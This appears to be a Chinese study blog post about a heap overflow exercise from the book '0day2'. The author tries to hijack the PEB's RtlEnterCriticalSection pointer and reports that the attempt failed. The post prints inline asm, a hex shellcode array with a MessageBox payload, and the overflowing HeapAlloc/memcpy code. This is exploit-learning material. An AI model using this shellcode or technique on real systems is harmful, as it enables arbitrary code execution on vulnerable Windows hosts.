相关文章我拍成了照片,放在了我的QQ空间不是做广告(一张一张的传太麻烦了)http://user.qzone.qq.com/252738331/photo/V10U5YUk2v0ol6/ 密码9EY3TI
这个相册的图片是0day2中的第五章 有关堆溢出的利用文章
一直想把这节尽快做完实验,由于工作和生活琐事耽误了。这个实验是p171的狙击PEB中的RtlEnterCritical-Section()函数指针。(这个实验我没做成功!就是没有msg下,但是还是有经验收获的)
首先获取PEB中的RtlEnterCritical-Section()函数指针,据作者说在PEB偏移0x20处存着呢!
1 /* 获取rtlEnterCritical-Section`s address */ 2 _asm{ 3 xor eax,eax 4 mov eax,fs:[eax+0x30] //peb 5 lea eax,[eax+0x20] 6 7 int 3 8 9 10 }
我的函数地址和书上一样的0x7ffdf020,但是我创建的堆的地址和书上不一样我是0x360000的而书上是0x520000,注意
char shellcode[] = { "x90x90x90x90x90x90x90x90xb8x20xf0xfd7fxbbx4cxaaxf8x77x89x18" "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0Cx8BxF4x8Dx7Ex0Cx33" "xDBxB7x04x2BxE3x66xBBx33x32x53x68x75x73x65x72x54x33xD2x64x8Bx5Ax30" "x8Bx4Bx0Cx8Bx49x1Cx57x56x8Bx69x08x8Bx79x20x8Bx09x66x39x57x18x75xF2" "x5Ex5FxADx3Dx6Ax0Ax38x1Ex75x05x95xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05" "x78x03xCDx8Bx59x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3AxC4" "x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75xE4x8Bx59x24x03xDDx66" "x8Bx3Cx7Bx8Bx59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75" "xA9x33xDBx53x68x61x61x61x61x68x62x62x62x62x8BxC4x53x50x50x53xFFx57" "xFCx53xFFx57xF8" "x88x06x36x00x20xf0xfdx7f" }; HLOCAL h1,h2,h3,h4,h5,h6; HANDLE hp; hp = HeapCreate(0,0x1000,0x10000); h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,200); memcpy(h1,shellcode,0x200); h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
调试过程中各种 报错,还没执行shellcode就 崩溃了。。。。
自己可以回去调试下
----------------------------------------------------
| QQ252738331
| Q群: 104132152(群名称是缓冲区溢出|汇编|逆向)
| 微博: http://t.qq.com/zhenw0
----------------------------------------------------